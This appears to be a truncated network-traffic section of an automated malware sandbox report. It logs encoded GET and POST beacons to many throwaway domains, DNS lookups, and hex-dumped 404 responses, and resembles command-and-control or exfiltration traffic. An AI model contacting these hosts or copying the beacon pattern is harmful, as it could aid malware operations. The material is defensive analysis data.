              Source: global trafficHTTP traffic detected: GET /bowc/?O2=aP0Tt&88v07=hSFyBF7QNpd6wUow9uUe+oJ47NX8i/8WjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nO+/1bJOK8Z/4V5qgzDPWvLYQmptlMfzF+8/0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lonfor.websiteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /cf9p/?88v07=tknvN2jlhTuvpXXYKbatHxztD/Ub9xeLNYYXG7/rIeGG9fe7kNXrAZC6u3EcgYD6CfYKVegcRI1iRuMeH9uFK+f9yqapepUfG+WEuydq9lZ8Jf8Ico0paCk=&O2=aP0Tt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.investshares.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /hqr6/?O2=aP0Tt&88v07=zX0jw1Jb7ql8GILhT0OEiPF9MmsqzXR3TcA9XJSzUhKPf0bKw3wcZTcOExSEJIWiFeUL4na64vamMH1j0X3tfc2GyGCINcJGtLdg83h47wzEv1WJs4WWtSs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nosolofichas.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /jpjz/?88v07=BsCB6j6XIP/wuAbzMvYD7rFnMTUj3QEoDDFnz1MrtzBPzJTq92en/EOyrjYaLx3w2H4L+FlVDICDydTs7KXcVAurUdDQdDmms6nVhCqDqAG2cNeT9xHcOvE=&O2=aP0Tt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /ctdy/?O2=aP0Tt&88v07=5YPKgWGFQCLPNGrM6Bx2/r3NiP9oDWgtkX9bUS/ECNXraKmEQnwhGYNyQa7ZIE66IC9AyTOQsA8Uagq2DQsZFTIkqAxP+kzEnb1pVMGGKhBzsI5+lu+iJts= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.adadev.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /8rr3/?88v07=iJ8hmWjdEFuk0u09mxt/i+URJBIu2+/oU8wTtz6qpCRnWDAwsuGK654yLyD0CfrWg+eEASr+Wzr+b0deN6ZH6nrWdXOKgOfZXH6QuC8SwJrjPV5LCLXfvVQ=&O2=aP0Tt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cifasnc.infoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /dx3i/?88v07=d8Ky6hmePKhU2XxFS8oVbq/fBtR8/SXw2U4uZFU2PglJR/EsTh4FCVpvl1B6U0BHfI68a/67nkOplmDPjd8pdEnMsHk7sWiNdLPva59bl5hhAP4TZGe3ZV4=&O2=aP0Tt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.denture-prices.clickConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /01c7/?O2=aP0Tt&88v07=YTigy0/11EA1EDEWI2qwNPkZTl2Ew25ueN49sLqr1toXUas0k4bLkY/pThMrKnph3bjNfCydzgD9Nz90+/wReHsi0Sd5n3+/SqbRiWTP8J7rQ0imHyBBNkU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.sonixingenuine.shopConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficHTTP traffic detected: GET /b9e2/?88v07=KXKmlftrGUnNwN71qtFvViHh9QQKT49uyIFWo1edE1ybkp1zCkMUBe9/9dTIwO/9znAhfptP/ghbc5af4f99NMc1rtl+75eG21JCXkgtBEctrkJEqfktzAA=&O2=aP0Tt HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.moyu19.proConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
              Source: global trafficDNS traffic detected: DNS query: www.gayhxi.info
              Source: global trafficDNS traffic detected: DNS query: www.promocao.info
              Source: global trafficDNS traffic detected: DNS query: www.grimbo.boats
              Source: global trafficDNS traffic detected: DNS query: www.44756.pizza
              Source: global trafficDNS traffic detected: DNS query: www.lonfor.website
              Source: global trafficDNS traffic detected: DNS query: www.investshares.net
              Source: global trafficDNS traffic detected: DNS query: www.nosolofichas.online
              Source: global trafficDNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top
              Source: global trafficDNS traffic detected: DNS query: www.adadev.info
              Source: global trafficDNS traffic detected: DNS query: www.cifasnc.info
              Source: global trafficDNS traffic detected: DNS query: www.ebsmadrid.store
              Source: global trafficDNS traffic detected: DNS query: www.denture-prices.click
              Source: global trafficDNS traffic detected: DNS query: www.sonixingenuine.shop
              Source: global trafficDNS traffic detected: DNS query: www.moyu19.pro
              Source: unknownHTTP traffic detected: POST /zaz4/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.promocao.infoOrigin: http://www.promocao.infoCache-Control: max-age=0Content-Length: 202Connection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.promocao.info/zaz4/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1Data Raw: 38 38 76 30 37 3d 58 39 76 6e 31 62 32 5a 30 41 74 43 54 57 56 4c 74 5a 37 6c 74 33 63 57 66 4c 59 46 49 54 65 6c 44 6d 49 4e 59 51 44 4d 50 47 49 70 69 6b 71 30 47 56 72 77 37 78 31 67 31 67 4e 73 78 48 4b 56 59 57 4e 35 30 78 78 7a 31 33 63 66 2f 69 56 6a 69 44 31 75 74 42 6b 50 6b 6d 49 45 2b 71 53 43 34 64 51 30 76 54 73 32 4b 43 61 46 4a 75 6d 62 63 74 4c 62 31 47 55 4c 30 7a 64 45 33 73 44 6a 64 34 78 78 4a 2f 58 59 75 69 41 54 69 49 30 4a 62 78 78 57 64 5a 51 72 51 56 43 54 41 44 63 7a 76 4f 6e 42 37 69 32 52 56 63 4b 2b 58 71 6c 39 6e 53 38 6a 7a 43 5a 61 50 4a 31 42 51 48 56 63 7a 67 3d 3d Data Ascii: 88v07=X9vn1b2Z0AtCTWVLtZ7lt3cWfLYFITelDmINYQDMPGIpikq0GVrw7x1g1gNsxHKVYWN50xxz13cf/iVjiD1utBkPkmIE+qSC4dQ0vTs2KCaFJumbctLb1GUL0zdE3sDjd4xxJ/XYuiATiI0JbxxWdZQrQVCTADczvOnB7i2RVcK+Xql9nS8jzCZaPJ1BQHVczg==
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:39:32 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H%2FPyAqkjR9vhGobRp8XUiZcIDx9BAFl0iakDJjSiaokFsdH03YpCrPhdyHDjYx5YUbwFoc%2Fm%2FvY%2FMHnnv3dAbtAd%2F8POt4tfvSXe%2B4MFpXcvVGVM2UDPsClH9HtI%2Fiby5Q5r"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90141388c8e90f9c-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1725&rtt_var=862&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=734&delivery_rate=0&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:39:34 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jFE8vadtxjtdkMOGfMJd6BtKQZTQQFvov9SMQL%2FsEo04RBTAd9H7sL96wkGYNsJ%2FfBPdFAUanC9cRmvN1f6QwTCJkHEkd%2BYIp88EpDGHJ6S0pe4Yy6SlGxqSkdLe7uvSLH6%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90141398b93042fd-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=754&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: efLAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:39:37 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CtQncH%2FmKiNoylO%2FTPJLTiENZ15c8oOEFwQvxNfbXgdcKtL8p0vN%2FBbpKkWcPNC4HnB9qfV4NBmJ%2FGrb8oFx451LzSNRrcIAkG4r4Tb3mrN6r5gch77KezQ4NmS7lfRK9zWN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901413a89e8c43bc-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10836&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f 41 4b c3 40 14 84 ef fb 2b 9e 3d e9 c1 7d 69 88 e0 e1 b1 60 9b 14 0b b1 06 9b 1c 3c 6e ba ab 1b 68 b3 71 f7 c5 e0 bf 97 a4 08 5e 67 be 19 66 e8 26 7f dd d6 ef 55 01 cf f5 4b 09 55 b3 29 f7 5b 58 dd 23 ee 8b 7a 87 98 d7 f9 d5 49 65 82 58 1c 56 4a 90 e3 cb 59 91 b3 da 28 41 dc f1 d9 aa 2c c9 e0 e0 19 76 7e ec 0d e1 55 14 84 0b 44 ad 37 3f 73 6e ad fe 31 6e ad 04 0d aa 76 16 82 fd 1a 6d 64 6b a0 79 2b 61 d2 11 7a cf f0 31 73 e0 7b 60 d7 45 88 36 7c db 20 09 87 b9 29 28 41 da 98 60 63 54 4f 83 3e 39 8b a9 cc e4 43 0a b7 4d 3b f6 3c de c1 71 09 80 66 98 a6 49 7e 86 ee d2 7a d9 7a cd 11 2a 1f 18 1e 13 c2 bf 0a 41 b8 6c 24 5c be fd 02 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 b2 5e 55 84 16 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e4LAK@+=}i`<nhq^gf&UKU)[X#zIeXVJY(A,v~UD7?sn1nvmdky+az1s{`E6| )(A`cTO>9CM;<qfI~zz*Al$\b^U0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:39:39 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kndgJFUmg3EYbrKXbu9TRXOv5JTF29vDAbrG%2BCyIrjiDWWTpKrHnzhMq5McIvmGXQi%2BnBQpFy9K0UIR%2F49do06Rgz5c9S9CwAr1bwMI2xIoST7bRvYHCKcMnBtpVFyGmO5up"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901413b96d6d41ba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1925&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=466&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 31 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 67 72 69 6d 62 6f 2e 62 6f 61 74 73 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 08:39:46 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 08:39:48 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 08:39:51 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 148Content-Type: text/htmlDate: Mon, 13 Jan 2025 08:39:53 GMTEtag: "6743f11f-94"Server: nginxConnection: closeData Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:40:00 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 34 30 34 22 3e 0d 0a 09 09 09 09 3c 68 31 3e 34 3c 73 70 61 6e 3e 30 3c 2f 73 70 61 6e 3e 34 3c 2f 68 31 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 68 32 3e 74 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 09 09 09 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 2d 73 65 61 72 63 68 22 3e 0d 0a 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 53 65 61 72 63 68 2e 2e 2e 22 3e 0d 0a 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 09 09 09 3c 2f 66 6f 72 6d 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</s
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 08:40:02 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 6c 